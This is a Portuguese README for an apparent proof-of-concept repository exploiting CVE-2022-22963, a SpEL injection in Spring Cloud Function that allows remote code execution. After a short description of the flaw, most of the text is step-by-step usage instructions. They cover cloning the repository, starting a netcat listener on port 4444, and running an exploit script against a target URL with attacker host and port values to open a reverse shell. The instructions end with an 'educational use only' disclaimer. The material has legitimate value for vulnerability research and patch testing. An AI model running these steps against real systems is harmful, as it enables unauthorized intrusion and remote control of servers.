
Exploração de prova de conceito para CVE-2022-22963, uma injeção SpEL no Spring Cloud Function que leva à execução remota de código. Inclui um script de shell para exploração automatizada com payload de shell reverso.
Nas versões 3.1.6, 3.2.2 e versões anteriores do Spring Cloud Function, ao utilizar a funcionalidade de roteamento é possível que um usuário forneça um SpEL especialmente projetado como uma expressão de roteamento que pode resultar na execução remota de código e no acesso a recursos locais.
Clone o repositório
git clone https://github.com/jrbH4CK/CVE-2022-22963.git
Entre na pasta
cd CVE-2022-22963
Altere as permissões de execução
chmode +x springCloud.sh
Inicie nc na porta desejada
nc -nlvp 4444
Execute o comando a seguir alterando os parâmetros de acordo com suas necessidades
./springCloud.sh url lhost lport
NOTA: O uso deste repositório é de responsabilidade de quem o utiliza e não do autor, apenas para fins educacionais.